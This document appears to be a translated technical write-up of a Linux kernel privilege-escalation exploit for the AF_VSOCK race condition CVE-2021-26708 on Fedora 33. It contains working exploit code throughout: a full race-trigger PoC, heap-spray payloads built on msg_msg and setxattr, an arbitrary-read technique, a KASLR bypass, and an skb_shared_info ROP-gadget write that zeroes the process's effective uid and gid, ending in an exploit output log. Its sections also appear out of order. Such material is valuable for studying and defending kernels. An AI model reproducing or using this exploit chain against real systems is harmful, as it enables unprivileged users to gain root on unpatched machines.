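The one-byte shift in desc can be reproduced with a user-space model of the write. The sketch assumes a little-endian machine and uses struct mock_cred, a simplified stand-in for the beginning of struct cred (the real structure has more fields). Its euid offset of 20 is consistent with the log above, where desc equals the owner cred address plus 19.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified mock of the start of struct cred; not the full kernel layout. */
struct mock_cred {
	int32_t usage;
	uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

#define MODEL_EUID_OFFSET offsetof(struct mock_cred, euid)

/* Credentials of an unprivileged user with all IDs set to 1000. */
static struct mock_cred user_1000(void)
{
	struct mock_cred c = { 1, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000 };
	return c;
}

/* Emulate the gadget: store the quadword 1 at (address of euid) - 1. */
static struct mock_cred write_one_before_euid(struct mock_cred c)
{
	const uint64_t one = 1;

	assert(MODEL_EUID_OFFSET == 20);
	memcpy((unsigned char *)&c + MODEL_EUID_OFFSET - 1, &one, sizeof(one));
	return c;
}
```

The 0x01 byte lands in the most significant byte of the preceding sgid field, the four bytes of euid become zero, and the low three bytes of egid become zero as well, which is enough for a gid of 1000.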
==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.
==Memory corruption==
The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes and is located in the kmalloc-64 block cache. The buf_alloc field type is u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least important bytes are written into the freed memory.
==Fuzzing==
The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
Only when val is different from the current buffer_size, will notify_buffer_size() be called, that is to say, when setsockopt() executes SO_VM_SOCKETS_BUFFER_SIZE, every time The size parameters of the call should all be different. So I built the relevant code:
/* * AF_VSOCK vulnerability trigger. * It's a PoC just for fun. * Author: Alexander Popov. */ #include #include #include #include #include #include #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define MAX_RACE_LAG_USEC 50 int vsock = -1; int tfail = 0; pthread_barrier_t barrier; int thread_sync(long lag_nsec) { int ret = -1; struct timespec ts0; struct timespec ts; long delta_nsec = 0; ret = pthread_barrier_wait(&barrier); if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) { perror("[-] pthread_barrier_wait"); return EXIT_FAILURE; } ret = clock_gettime(CLOCK_MONOTONIC, &ts0); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } while (delta_nsec < lag_nsec) { ret = clock_gettime(CLOCK_MONOTONIC, &ts); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 + ts.tv_nsec - ts0.tv_nsec; } return EXIT_SUCCESS; } void *th_connect(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct sockaddr_vm addr = { .svm_family = AF_VSOCK, }; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } addr.svm_cid = VMADDR_CID_LOCAL; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); addr.svm_cid = VMADDR_CID_HYPERVISOR; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); return NULL; } void *th_setsockopt(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct timespec tp; unsigned long size = 0; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } clock_gettime(CLOCK_MONOTONIC, &tp); size = tp.tv_nsec; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(unsigned long)); return NULL; } int main(void) { int ret = -1; unsigned long size = 0; long loop = 0; pthread_t th[2] = { 0 }; vsock = socket(AF_VSOCK, SOCK_STREAM, 0); if (vsock == -1) err_exit("[-] open vsock"); printf("[+] AF_VSOCK socket is opened\n"); size = 1; setsockopt(vsock, 
PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(unsigned long)); size = 0xfffffffffffffffdlu; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE, &size, sizeof(unsigned long)); ret = pthread_barrier_init(&barrier, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); for (loop = 0; loop < 30000; loop++) { long tmo1 = 0; long tmo2 = loop % MAX_RACE_LAG_USEC; printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2); ret = pthread_create(&th[0], NULL, th_connect, &tmo1); if (ret != 0) err_exit("[-] pthread_create #0"); ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2); if (ret != 0) err_exit("[-] pthread_create #1"); ret = pthread_join(th[0], NULL); if (ret != 0) err_exit("[-] pthread_join #0"); ret = pthread_join(th[1], NULL); if (ret != 0) err_exit("[-] pthread_join #1"); if (tfail) { printf("[-] some thread got troubles\n"); exit(EXIT_FAILURE); } } ret = close(vsock); if (ret) perror("[-] close"); printf("[+] now see your warnings in the kernel log\n"); return 0; }
The size value here is taken from the nanosecond count returned by clock_gettime(), so it may differ on every run. The original syzkaller reproducer does not do this: when syzkaller generates fuzzing input, the values of the syscall parameters are fixed and do not change during execution.
==The power of four bytes==
I chose Fedora 33 Server as the research target, with kernel version 5.10.11-200.fc33.x86_64, and set out to bypass SMEP and SMAP.
As a first step, I looked for a stable heap spray: user-space activity that makes the kernel allocate another 64-byte object at the location of the freed virtio_vsock_sock. After several experiments I confirmed that the freed virtio_vsock_sock can be overwritten, so heap spraying is feasible. Eventually I found the msgsnd() syscall. It creates struct msg_msg in kernel space; see the pahole output:
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
The message header comes first, followed by the message data. If struct msgbuf in user space has a 16-byte mtext, the corresponding msg_msg is created in the kmalloc-64 slab cache. A 4-byte write-after-free then corrupts the void *security pointer at offset 40. The msg_msg.security field points to kernel data allocated by lsm_msg_msg_alloc(), and when the msg_msg is received, that data is freed by security_msg_msg_free(). Therefore, corrupting the first half of the security pointer (the lower four bytes on little-endian x86_64) yields an arbitrary free.
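The size arithmetic and the effect of the 4-byte overwrite can be sketched in a few lines of C. This is only an illustration: the header size comes from the pahole output above, while the helper names msg_msg_alloc_size() and overwrite_low32() are hypothetical and do not appear in the exploit. The sketch assumes a little-endian machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* sizeof(struct msg_msg) on the target kernel, per the pahole output. */
#define MSG_MSG_HDR_SIZE 48

/* Bytes allocated for a message whose text fits in a single block:
 * the header followed directly by the message text. */
size_t msg_msg_alloc_size(size_t mtext_len)
{
	return MSG_MSG_HDR_SIZE + mtext_len;
}

/* Model of a 4-byte write landing on the start of an 8-byte pointer field.
 * On a little-endian machine this replaces the low 32 bits and keeps the
 * high 32 bits untouched. */
uint64_t overwrite_low32(uint64_t ptr, uint32_t val)
{
	memcpy(&ptr, &val, sizeof(val));
	return ptr;
}
```

With a 16-byte mtext the first helper returns 64, which is why the object lands in kmalloc-64. The second helper shows why four controlled bytes can be enough: as long as the target object shares the upper 32 address bits with the original pointer, replacing only the lower half redirects security to it.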
==Kernel Information Leak==
The same technique as for [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E CVE-2019-18683] is used here. The second connect() on the virtual socket calls vsock_deassign_transport(), which sets vsk->transport to NULL. As a result, when vsock_stream_setsockopt() calls virtio_transport_send_pkt_info() after the memory corruption, a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
 virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
 vsock_update_buffer_size+0x5f/0x70 [vsock]
 vsock_stream_setsockopt+0x128/0x270 [vsock]
...
Debugging with gdb shows that the RCX register contains the kernel address of the freed virtio_vsock_sock and the RBX register contains the kernel address of vsock_sock.
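Extracting those two addresses from the kernel log is a small string-parsing task. The following is a minimal sketch of one way to do it; parse_reg() is a hypothetical helper written for this illustration, not code from the exploit, and it assumes the register dump format shown in the warning above.

```c
#include <stdio.h>
#include <string.h>

/* Find "<name>: <hex value>" in a kernel log line and parse the value.
 * Returns 0 on success, -1 if the register is not present in the line. */
int parse_reg(const char *line, const char *name, unsigned long *out)
{
	char key[16];
	const char *p;

	snprintf(key, sizeof(key), "%s: ", name);
	p = strstr(line, key);
	if (!p)
		return -1;

	/* Register values are printed as 16 hex digits without a 0x prefix. */
	return sscanf(p + strlen(key), "%16lx", out) == 1 ? 0 : -1;
}
```

Calling parse_reg(line, "RCX", &addr) on the line that starts with "RAX:" yields the address of the freed virtio_vsock_sock, and "RBX" yields the address of vsock_sock.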
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
1. Free an object at the leaked kernel address
2. Perform heap spraying to overwrite that object with controlled data
3. Use the corrupted object for privilege escalation
A System V message in the kernel has a maximum size of DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg). If you send a larger message, the remainder is stored in a list of message segments. The msg_msg contains struct msg_msgseg *next, which points to the first segment, and size_t m_ts, which stores the total size. When overwriting the object, you can therefore put controlled values into msg_msg.m_ts and msg_msg.next:

Payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
	struct msg_msg *msg_ptr;

	xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

	/* Don't touch the second part to avoid breaking page fault delivery */
	memset(spray_data, 0xa5, PAGE_SIZE * 4);

	printf("[+] adapt the msg_msg spraying payload:\n");
	msg_ptr = (struct msg_msg *)xattr_addr;
	msg_ptr->m_type = 0x1337;
	msg_ptr->m_ts = ARB_READ_SZ;
	msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
	printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
	       msg_ptr,
	       msg_ptr->m_type, &(msg_ptr->m_type),
	       msg_ptr->m_ts, &(msg_ptr->m_ts),
	       msg_ptr->next, &(msg_ptr->next));
}
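The placement of the payload in the spray buffer can be checked with simple arithmetic. The sketch below is an illustration under stated assumptions: payload_start() is a hypothetical helper, and the idea that the payload must end exactly where the userfaultfd()-monitored page begins is inferred from the exploit output at the end of this article (spray_data at 0x7f0d9111d000, userfaultfd start at 0x7f0d91121000).

```c
#include <stdint.h>

#define SPRAY_PAGE_SIZE 4096UL

/* Start address of a payload of `len` bytes that ends exactly at the
 * beginning of the monitored page, which follows `pages` ordinary pages. */
uintptr_t payload_start(uintptr_t spray_data, unsigned long pages,
			unsigned long len)
{
	return spray_data + SPRAY_PAGE_SIZE * pages - len;
}
```

For the values above, payload_start(0x7f0d9111d000, 4, 40) gives 0x7f0d91120fd8, which matches the msg_ptr printed by the exploit. A 40-byte payload covers m_list, m_type, m_ts and next according to the pahole layout, so presumably the security pointer at offset 40 is the first byte that falls into the monitored page.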
But how can msg_msg be used to read kernel data? Reading the msgrcv() system call documentation, I found a good solution: msgrcv() with the MSG_COPY flag:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag makes the kernel copy the message data to user space without removing the message from the queue. MSG_COPY is available if the kernel is built with CONFIG_CHECKPOINT_RESTORE=y, which is the case for Fedora Server.
===Steps of arbitrary reading===
1. Preparation:
* Use sched_getaffinity() and CPU_COUNT() to count the available CPUs (the exploit needs at least two);
* Open /dev/kmsg for parsing;
* mmap() the spray_data memory area and configure userfaultfd() for its last part;
* Start a separate pthread to handle userfaultfd() events;
* Start 127 pthreads for setxattr()&userfaultfd() heap spraying over msg_msg and hang them on a pthread_barrier.
2. Get the kernel address of the original msg_msg:
* Win the race on the virtual socket;
* After the second connect(), wait 35 microseconds in a busy loop;
* Call msgsnd() for a separate message queue; after the memory corruption, the msg_msg object is placed at the virtio_vsock_sock location;
* Parse the kernel log and save the kernel address of msg_msg from the kernel warning (RCX register);
* Also save the kernel address of vsock_sock from the RBX register.
3. Perform an arbitrary free of the original msg_msg using a corrupted msg_msg:
* Use four bytes of the original msg_msg address as SO_VM_SOCKETS_BUFFER_SIZE for the memory corruption;
* Win the race on the virtual socket;
* Call msgsnd() right after the second connect(); this msg_msg is placed at the virtio_vsock_sock location and gets corrupted;
* The security pointer of the corrupted msg_msg now stores the address of the original msg_msg (from step 2);
* If the corruption of msg_msg.security by the setsockopt() thread happens while msgsnd() is being handled, the SELinux permission check fails;
* In that case msgsnd() returns -1 and the corrupted msg_msg is destroyed; freeing msg_msg.security frees the original msg_msg.
4. Overwrite the original msg_msg with a controlled payload:
* After msgsnd() fails, the exploit calls pthread_barrier_wait(), which wakes the 127 spraying pthreads;
* These pthreads execute setxattr() with the payload;
* The original msg_msg is now overwritten with controlled data, and its msg_msg.next pointer stores the address of the vsock_sock object.
5. Read the contents of the vsock_sock kernel object into user space by receiving a message from the message queue that stores the overwritten msg_msg:
ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
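Why this msgrcv() call leaks memory at msg_msg.next follows from how a message is split between the msg_msg block and its segments. The sketch below illustrates that split; the helper names are hypothetical, the 48-byte header size is taken from the pahole output, and the value 6096 used in the note is the m_ts printed in the exploit output, which is assumed here to be ARB_READ_SZ.

```c
#include <stddef.h>

#define PAGE_SIZE_BYTES  4096UL
#define MSG_MSG_HDR_SIZE 48UL	/* sizeof(struct msg_msg), from pahole */
#define DATALEN_MSG      (PAGE_SIZE_BYTES - MSG_MSG_HDR_SIZE)

/* Bytes of an m_ts-sized message that are stored in the msg_msg block. */
size_t bytes_from_head(size_t m_ts)
{
	return m_ts < DATALEN_MSG ? m_ts : DATALEN_MSG;
}

/* Bytes that come from the segment list reached through msg_msg.next. */
size_t bytes_from_segments(size_t m_ts)
{
	return m_ts - bytes_from_head(m_ts);
}
```

With m_ts set to 6096, the first 4048 bytes are copied from the overwritten msg_msg block itself and the remaining 2048 bytes are copied from the memory that msg_msg.next points to. That second part is the arbitrary read, which is why the leaked data is later indexed at DATALEN_MSG plus an offset.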
==Find the target of attack==
Here is what I found in the vsock_sock memory:
1. Many pointers to objects from dedicated slab caches, such as PINGv6 and sock_inode_cache.
2. The struct mem_cgroup *sk_memcg pointer at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in the kmalloc-4k slab cache.
3. The const struct cred *owner pointer at offset 840 in vsock_sock. It stores the address of the credentials, which can be overwritten for privilege escalation.
4. The void (*sk_write_space)(struct sock *) function pointer at offset 688 in vsock_sock.sk. It is set to the address of the sock_def_write_space() kernel function and can be used to calculate the KASLR offset.
Here is how the exploit extracts these pointers from the leaked memory:
#define SK_MEMCG_OFFSET 664
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
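The arithmetic in this listing can be reproduced in isolation. The following sketch uses hypothetical helper names (leaked_qword(), kaslr_slide(), rebase()); the constants are the ones given in the text, and the sample values in the note come from the exploit output at the end of this article.

```c
#include <stddef.h>
#include <stdint.h>

#define DATALEN_MSG          4048UL	/* PAGE_SIZE - sizeof(struct msg_msg) */
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0UL /* address without KASLR */

/* Fetch the 64-bit word stored at byte offset `loc` of the leaked buffer. */
uint64_t leaked_qword(const uint64_t *kmem, size_t loc)
{
	return kmem[loc / sizeof(uint64_t)];
}

/* KASLR offset: leaked runtime address minus the known static address. */
uint64_t kaslr_slide(uint64_t leaked_sock_def_write_space)
{
	return leaked_sock_def_write_space - SOCK_DEF_WRITE_SPACE;
}

/* Runtime address of any other kernel symbol or gadget. */
uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
	return static_addr + slide;
}
```

For the leaked value ffffffffab9851b0 the slide is 2a000000, and the read location DATALEN_MSG + 688 equals 4736, both matching the exploit output. The same slide is later added to the static gadget address to obtain the callback pointer.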
==Implement Use-after-free on sk_buff==
A network buffer in the Linux kernel is represented by struct sk_buff. This object has skb_shared_info with destructor_arg, which can be used for control-flow hijacking. The network data and skb_shared_info are placed in the same kernel memory block, pointed to by sk_buff.head. Therefore, creating a 2800-byte network packet in user space makes skb_shared_info get allocated in the kmalloc-4k slab cache, the same cache that holds the mem_cgroup objects.
I constructed the following procedure:
1. Use socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create one client socket and 32 server sockets
2. Prepare a 2800-byte buffer in user space and memset() it with 0x42
3. Use sendto() to send this buffer from the client socket to each server socket, which creates sk_buff objects in kmalloc-4k. Do this on every available CPU using sched_setaffinity()
4. Perform the arbitrary read procedure on vsock_sock
5. Calculate a possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)
6. Perform the arbitrary read on this possible sk_buff address
7. If 0x4242424242424242lu is found at the location of the network data, the real sk_buff is found; go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6
8. Start 32 pthreads for setxattr()&userfaultfd() heap spraying over sk_buff and hang them on a pthread_barrier
9. Perform an arbitrary free of the sk_buff kernel address
10. Call pthread_barrier_wait(), which wakes the 32 heap-spraying pthreads; they execute setxattr() to overwrite skb_shared_info
11. Use recv() to receive the network messages on the server sockets.
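Steps 5 to 7 form a simple search loop over neighbouring kmalloc-4k objects. The sketch below models that loop; it is not the exploit code. The arb_read_fn callback is a hypothetical stand-in for the msg_msg-based arbitrary read, and fake_read() together with FAKE_SKB_ADDR exists only so the loop can be exercised in user space.

```c
#include <stddef.h>
#include <stdint.h>

#define SLAB_OBJ_SIZE 4096UL			/* kmalloc-4k object size */
#define SKB_MARKER    0x4242424242424242UL	/* eight bytes of 0x42 filler */
#define FAKE_SKB_ADDR 0xffff9125c42fb000UL	/* made-up address for the demo */

/* Hypothetical callback: returns the qword that the arbitrary read finds
 * in the network data of the object at kernel address `kaddr`. */
typedef uint64_t (*arb_read_fn)(uint64_t kaddr);

/* Walk the kmalloc-4k neighbours of sk_memcg until the filler shows up.
 * Returns the matching address, or 0 after `max_tries` candidates. */
uint64_t find_sprayed_skb(uint64_t sk_memcg, arb_read_fn rd, int max_tries)
{
	uint64_t cand = sk_memcg + SLAB_OBJ_SIZE;

	for (int i = 0; i < max_tries; i++, cand += SLAB_OBJ_SIZE) {
		if (rd(cand) == SKB_MARKER)
			return cand;
	}
	return 0;
}

/* Demo stand-in for kernel memory: only one object holds the filler. */
uint64_t fake_read(uint64_t kaddr)
{
	return kaddr == FAKE_SKB_ADDR ? SKB_MARKER : 0;
}
```

In the exploit each iteration is expensive, because every arbitrary read requires winning the race again, so a bound such as max_tries is a reasonable safeguard in a sketch like this.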
==Arbitrary write via skb_shared_info==
The following is a valid payload that overwrites the sk_buff object:
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);
skb_shared_info resides in the sprayed data exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. Because the kernel address of the attacked sk_buff is known, a fake ubuf_info can be created at MY_UINFO_OFFSET in the network buffer. The following is the layout of a valid payload:

Let's talk about the destructor_arg callback:
/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
Since I could not find a gadget in vmlinuz-5.10.11-200.fc33.x86_64 that met my constraints, I worked out this arbitrary write primitive myself.
The callback function pointer stores the address of the ROP gadget. RDI holds the first argument of the callback, which is the address of ubuf_info itself, so RDI + 8 points to ubuf_info.desc. The gadget moves ubuf_info.desc into RDX, so RDX now contains the address of the effective user ID and group ID minus one byte. This byte matters: when the gadget writes the quadword value 1 from RSI to the memory pointed to by RDX, the effective uid and gid are overwritten with zeros. The same procedure is repeated until the privileges are escalated to root. The output of the whole exploit looks like this:
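The effect of the one-byte shift can be modelled in user space. The sketch below is an illustration, not kernel code: struct fake_cred is a simplified stand-in whose field order is an assumption chosen so that euid sits at offset 20 (consistent with the desc value in the output, which is owner cred plus 19), and gadget_write() imitates the single store performed by the gadget on a little-endian machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the id fields of struct cred (assumed layout). */
struct fake_cred {
	uint32_t usage;
	uint32_t uid, gid, suid, sgid;
	uint32_t euid, egid;
	uint32_t fsuid, fsgid;
};

/* Model of "mov qword ptr [rdx + rcx*8], rsi" with rcx = 0:
 * store the 8-byte value rsi at address rdx. */
void gadget_write(unsigned char *rdx, uint64_t rsi)
{
	memcpy(rdx, &rsi, sizeof(rsi));
}

/* Apply the write one byte before euid, as the payload does with desc - 1. */
void zero_euid_egid(struct fake_cred *c)
{
	unsigned char *euid_addr = (unsigned char *)&c->euid;

	gadget_write(euid_addr - 1, 1);
}
```

The only non-zero byte of the stored quadword lands in the top byte of the field before euid, the four bytes of euid become zero, and so do the three low bytes of egid. In this model egid ends up as zero because its top byte was already zero, which holds for an ordinary gid such as 1000.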
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
